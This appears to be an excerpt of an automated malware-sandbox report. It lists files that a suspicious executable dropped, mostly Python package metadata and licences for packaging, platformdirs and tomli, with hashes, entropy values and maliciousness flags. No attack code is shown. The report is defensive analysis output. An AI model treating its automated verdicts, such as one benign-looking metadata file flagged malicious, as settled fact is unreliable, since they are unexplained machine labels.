                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFML6KjP+tPCCfA5I:Rt1QqL6gWBB3
                                                                                                                                                                                                                              MD5:FE76A5D309B5416824C2034FBF8A16CD
                                                                                                                                                                                                                              SHA1:5975EB6043863B0D018A5D751293F38E0B8E2874
                                                                                                                                                                                                                              SHA-256:AD282AFC9A4717D7C7475971E77AB083FD7ED8BCA9644FEA99CB976D552AF78F
                                                                                                                                                                                                                              SHA-512:6E4610171DD4E7E49FB4570CF3562D26A4F171FF67DA0F3A259A77916ACB939C8FCA7DA9F473EFAD839947796AC8CD7385DAA3264ADB150FF131A5C0FAC9329C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.8.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):197
                                                                                                                                                                                                                              Entropy (8bit):4.510719529760597
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreBNA2eBKmJozlMHuO:h9Co8FyQjkDYc5tWreBN0n2mH1
                                                                                                                                                                                                                              MD5:FAADAEDCA9251A90B205C9167578CE91
                                                                                                                                                                                                                              SHA1:ED1FCABA1DBBF55113ABB419A484F3DF63E7ECFC
                                                                                                                                                                                                                              SHA-256:CAD1EF5BD340D73E074BA614D26F7DEACA5C7940C3D8C34852E65C4909686C48
                                                                                                                                                                                                                              SHA-512:1E69C89558FFE39E5C1EBB6728C4F0EB6023563C7A7F31B5417A8EFCC906378D2E2AF7B0E06A66980FBAAB7996AEB2AE1EA3918FDBE5FFCC3F77EA888A68EFBC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to this software is made.under the terms of *both* these licenses..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10174
                                                                                                                                                                                                                              Entropy (8bit):4.3908324771089084
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLhP:U9vlKM1zJlFvmNz5VrZ
                                                                                                                                                                                                                              MD5:2EE41112A44FE7014DCE33E26468BA93
                                                                                                                                                                                                                              SHA1:598F87F072F66E2269DD6919292B2934DBB20492
                                                                                                                                                                                                                              SHA-256:0D542E0C8804E39AA7F37EB00DA5A762149DC682D7829451287E11B938E94594
                                                                                                                                                                                                                              SHA-512:27B8C0252EAE50CA3CE02AB7C5670664C0C824E03EB3DA1089F3F0A00D23E648A956BCB9F53645C6D79674A87C4CC86D1085DC335911BE0210D691336B121857
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1344
                                                                                                                                                                                                                              Entropy (8bit):5.070827944686827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:fjUnoorbOFFTJJyRrYFTjz796432s4EOkUs8gROF32s3yTtTf413tf9fsZlTHv:fkOFJSrYJR6432svI32s3Stc13tfyTHv
                                                                                                                                                                                                                              MD5:7BEF9BF4A8E4263634D0597E7BA100B8
                                                                                                                                                                                                                              SHA1:FDC0E4EABC45522B079DEFF7D03D70528D775DC0
                                                                                                                                                                                                                              SHA-256:B70E7E9B742F1CC6F948B34C16AA39FFECE94196364BC88FF0D2180F0028FAC5
                                                                                                                                                                                                                              SHA-512:96C3273D51B83B6AE1AB85FEFB814DCD6C1E60D311D412242405AA429CC860412477CBD6ECE171408DBB85F0C4FD742E3AF20C758015BC48406AA65A1AB6F60A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Copyright (c) Donald Stufft and individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE.FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL.DAMAGES (INCLUDING, BUT NOT LIM
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3204
                                                                                                                                                                                                                              Entropy (8bit):4.9859857663557925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DRKnOkaMktjaVMxsxCp5QXFfFKiYEvA9TzBnyD:psZfFhgXNG
                                                                                                                                                                                                                              MD5:3236C0D7091D4A6577FA30E061480CEC
                                                                                                                                                                                                                              SHA1:F99865B8D3B90AD64A0060F7F2F4C6E4FAEB0A39
                                                                                                                                                                                                                              SHA-256:5F7A283B75A709FCCD481AEA42379F083D4F3801753365922E6B0732042515D9
                                                                                                                                                                                                                              SHA-512:A9F0BC43A135732510B98E9C0B7F997D9557A6069352372F1AC3216F0E66FA617D9597990904935D58E5139FB34E17995BFA8B95B90C71997206A2B6955FE867
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: packaging.Version: 24.1.Summary: Core utilities for Python packages.Author-email: Donald Stufft <donald@stufft.io>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3.13.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2565
                                                                                                                                                                                                                              Entropy (8bit):5.780503861671858
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:bsnuXksXW2Bsv8VsQ7lEsahOsbs5Jhsde8UogvtJkHpHAfEcysrD5WJeCzESowj:vXrW2s8JsMdVogvtJkJgfksP5qeCzOwj
                                                                                                                                                                                                                              MD5:88FBF3C6BD08040482212DAD5A8EAB02
                                                                                                                                                                                                                              SHA1:E7EE66942F7321FB77888D492D57C2EEEA1A5171
                                                                                                                                                                                                                              SHA-256:38A6898306293627C81E2B2D8A93E5F6857D5F7EDB73F0334E8D9A53DAD53B6E
                                                                                                                                                                                                                              SHA-512:786AE1F883A999A0939C22A756F90D74CC7F87AAF13F6FFF22D8D962D213A1ECBC6AAE2890A5D7347487824CD0E9EB440A3923F01F938EEF068719DFEEE96554
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:packaging-24.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..packaging-24.1.dist-info/LICENSE,sha256=ytHvW9NA1z4HS6YU0m996spceUDD2MNIUuZcSQlobEg,197..packaging-24.1.dist-info/LICENSE.APACHE,sha256=DVQuDIgE45qn836wDaWnYhSdxoLXgpRRKH4RuTjpRZQ,10174..packaging-24.1.dist-info/LICENSE.BSD,sha256=tw5-m3QvHMb5SLNMFqo5_-zpQZY2S8iP8NIYDwAo-sU,1344..packaging-24.1.dist-info/METADATA,sha256=X3ooO3WnCfzNSBrqQjefCD1POAF1M2WSLmsHMgQlFdk,3204..packaging-24.1.dist-info/RECORD,,..packaging-24.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..packaging-24.1.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..packaging/__init__.py,sha256=dtw2bNmWCQ9WnMoK3bk_elL1svSlikXtLpZhCFIB9SE,496..packaging/__pycache__/__init__.cpython-312.pyc,,..packaging/__pycache__/_elffile.cpython-312.pyc,,..packaging/__pycache__/_manylinux.cpython-312.pyc,,..packaging/__pycache__/_musllinux.cpython-312.pyc,,..packaging/__pycache__/_parser.cpython-312.pyc,,
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11429
                                                                                                                                                                                                                              Entropy (8bit):5.039575520713946
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:n9x/tlCtlsaCUpVQ7yHwgNF8NFvWVDM1RnzadSibNTTh+fOnnxa6jlES4h8a8KAH:3/tlCfsqpq7ydZzM0dGiCbvHcjNj61TA
                                                                                                                                                                                                                              MD5:12306075DF09A0DBB93315FADDDF73FB
                                                                                                                                                                                                                              SHA1:1AC8A3679AFCFEEC0BA00851F5F8095DD1B060CD
                                                                                                                                                                                                                              SHA-256:CE6B227B4D46D4CB57474C2022FE57A557933BB89DAF4596BDF9B12AC296B869
                                                                                                                                                                                                                              SHA-512:BA0A72B888A14F82FD44FB103C01EF0900B5302F18E986A8264A9A08AB77D1C655C392374FD7B0A98BEF9B9511F6EC78AF3EF8936091C80A0B5364F7A53DC20A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.3.Name: platformdirs.Version: 4.2.2.Summary: A small Python package for determining appropriate platform-specific dirs, e.g. a `user data dir`..Project-URL: Documentation, https://platformdirs.readthedocs.io.Project-URL: Homepage, https://github.com/platformdirs/platformdirs.Project-URL: Source, https://github.com/platformdirs/platformdirs.Project-URL: Tracker, https://github.com/platformdirs/platformdirs/issues.Maintainer-email: Bern.t G.bor <gaborjbernat@gmail.com>, Julian Berman <Julian@GrayVines.com>, Ofek Lev <oss@ofek.dev>, Ronny Pfannschmidt <opensource@ronnypfannschmidt.de>.License-Expression: MIT.License-File: LICENSE.Keywords: appdirs,application,cache,directory,log,user.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1642
                                                                                                                                                                                                                              Entropy (8bit):5.780720255872038
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:bn/2zDzoobEsJhfPWcs013+pj456szN6lnhta57WJ+guQg4:bnuXcob5Jhfucs+d49hta9WJ+g1X
                                                                                                                                                                                                                              MD5:0E141A28570FC62974FC5CEADFE808E3
                                                                                                                                                                                                                              SHA1:7B92561C5BBBA83D6E16A1C7B195089ACA1766AF
                                                                                                                                                                                                                              SHA-256:4C211D76D42ED40EFC3ACFCC866D8912A718AFBCA2B7E51849442366D6E99FE8
                                                                                                                                                                                                                              SHA-512:830721C18A35AECD1EFB81A5FAAF8AC0EA02428EDC5B294458556343788D894B76035F1E661214D975DF2A64DC8C3D6AAA7A53A99BE64B9413B6A5D89D549F9D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:platformdirs-4.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..platformdirs-4.2.2.dist-info/METADATA,sha256=zmsie01G1MtXR0wgIv5XpVeTO7idr0WWvfmxKsKWuGk,11429..platformdirs-4.2.2.dist-info/RECORD,,..platformdirs-4.2.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..platformdirs-4.2.2.dist-info/WHEEL,sha256=zEMcRr9Kr03x1ozGwg5v9NQBKn3kndp6LSoSlVg-jhU,87..platformdirs-4.2.2.dist-info/licenses/LICENSE,sha256=KeD9YukphQ6G6yjD_czwzv30-pSHkBHP-z0NS-1tTbY,1089..platformdirs/__init__.py,sha256=EMGE8qeHRR9CzDFr8kL3tA8hdZZniYjXBVZd0UGTWK0,22225..platformdirs/__main__.py,sha256=HnsUQHpiBaiTxwcmwVw-nFaPdVNZtQIdi1eWDtI-MzI,1493..platformdirs/__pycache__/__init__.cpython-312.pyc,,..platformdirs/__pycache__/__main__.cpython-312.pyc,,..platformdirs/__pycache__/android.cpython-312.pyc,,..platformdirs/__pycache__/api.cpython-312.pyc,,..platformdirs/__pycache__/macos.cpython-312.pyc,,..platformdirs/__pycache__/unix.cpython-312.pyc,,..platformdirs/__p
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):87
                                                                                                                                                                                                                              Entropy (8bit):4.730668933656452
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXAaCTR73RP+tPCCfA5I:Rt2PFRWBB3
                                                                                                                                                                                                                              MD5:8895639B8515B3094302B59E28AFB562
                                                                                                                                                                                                                              SHA1:FBD4DA759EA5BEB65AE820DFBC47F9B569E89519
                                                                                                                                                                                                                              SHA-256:CC431C46BF4AAF4DF1D68CC6C20E6FF4D4012A7DE49DDA7A2D2A1295583E8E15
                                                                                                                                                                                                                              SHA-512:B53C0978DAD2A7195058ABC7B7D20A229EC617BDDBB364D8ED2354F37D5071208735774350F9FBBA5C804BEFCEFE71C27BC5E468E12899DF4687189C468785A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: hatchling 1.24.2.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1089
                                                                                                                                                                                                                              Entropy (8bit):5.119723466133474
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:VrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:VaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                              MD5:EA4F5A41454746A9ED111E3D8723D17A
                                                                                                                                                                                                                              SHA1:F511A8A63AF8C6E36004B593478436BBC560EE0C
                                                                                                                                                                                                                              SHA-256:29E0FD62E929850E86EB28C3FDCCF0CEFDF4FA94879011CFFB3D0D4BED6D4DB6
                                                                                                                                                                                                                              SHA-512:CACA68A5589CA2EAB7C0D74BA5D2B25E3367B9902DFC7578BBA911AC8F8BF1C3A13F25E663C5B6B19BA71BF611943E23F4D0A99BE92A8F7D7FF60732DC3DD409
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2010-202x The platformdirs developers..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1072
                                                                                                                                                                                                                              Entropy (8bit):5.10135495500641
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:f9rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:1aJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                              MD5:AAAAF0879D17DF0110D1AA8C8C9F46F5
                                                                                                                                                                                                                              SHA1:9DA6CA26337A886FB3E8D30EFD4AEDA623DC9ADE
                                                                                                                                                                                                                              SHA-256:B80816B0D530B8ACCB4C2211783790984A6E3B61922C2B5EE92F3372AB2742FE
                                                                                                                                                                                                                              SHA-512:EECD0C29FEBF51ADEFB02F970E66EFE7E24D573686DFDB3BEEA63CEFEA012A79CE3C49A899B4F26E9B67DC27176B397F6041909227281F9866BEEDC97389095C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2021 Taneli Hukkinen..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CON
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8875
                                                                                                                                                                                                                              Entropy (8bit):4.884349533695185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:h15VsahrDzoGlmLxUJyLIPXR/yrKK3Trclclg2pj4VRR6V8wNVonQd:3swrAamWuIPA2K3v2g
                                                                                                                                                                                                                              MD5:CBBF7047A51FEDA58386E86182B85B8A
                                                                                                                                                                                                                              SHA1:D3EA3BDA227794AE35FE7FFC5BD6E5FA2A5EF250
                                                                                                                                                                                                                              SHA-256:CCF0DC78A98FC0918B5AD67292B1E2C4BED65575A6246CD9D63C914F9942A0F2
                                                                                                                                                                                                                              SHA-512:A994914F1676790730C6BDACA26FE5F1B18BA9A3B9F0D24D708C722424DED255360A0CC88E239C6BFE467BD2763DF7339BB6B760AB090FAE474A7C9C8AFA8948
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: tomli.Version: 2.0.1.Summary: A lil' TOML parser.Keywords: toml.Author-email: Taneli Hukkinen <hukkin@users.noreply.github.com>.Requires-Python: >=3.7.Description-Content-Type: text/markdown.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: MacOS.Classifier: Operating System :: Microsoft :: Windows.Classifier: Operating System :: POSIX :: Linux.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Typing :: Typed.Project-URL: Changelog, https://github.com/hukkin/tomli/blob/master/CHANGELOG.md.Project-URL:
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):999
                                                                                                                                                                                                                              Entropy (8bit):5.89030761653127
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4n/2zDRv53Pb4EsJWc6QtD8r8N8bh8WNdop2+oM8+kzAL5+1:4nuXR1Pb45JWc6QmIebKWcpHoM8JMLy
                                                                                                                                                                                                                              MD5:D5FAB61E3DB6B54B51FBA607865C195B
                                                                                                                                                                                                                              SHA1:B94D9126E8FC9D5F29FAFBB67F068E2D111D17FC
                                                                                                                                                                                                                              SHA-256:0CB9F9A451A1E365AC54B4C88662E1DA0CB54A72D16A5258FB0ABFF9D3E1C022
                                                                                                                                                                                                                              SHA-512:ABD3EF61D8D578C1DE609560A6985503E60BD53F90DCFF54EBEE23714D9CD88DBA4036ED19B24EC62B8432550311894FCC47BDCCD7CE4DCDE82518F4E02E123C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
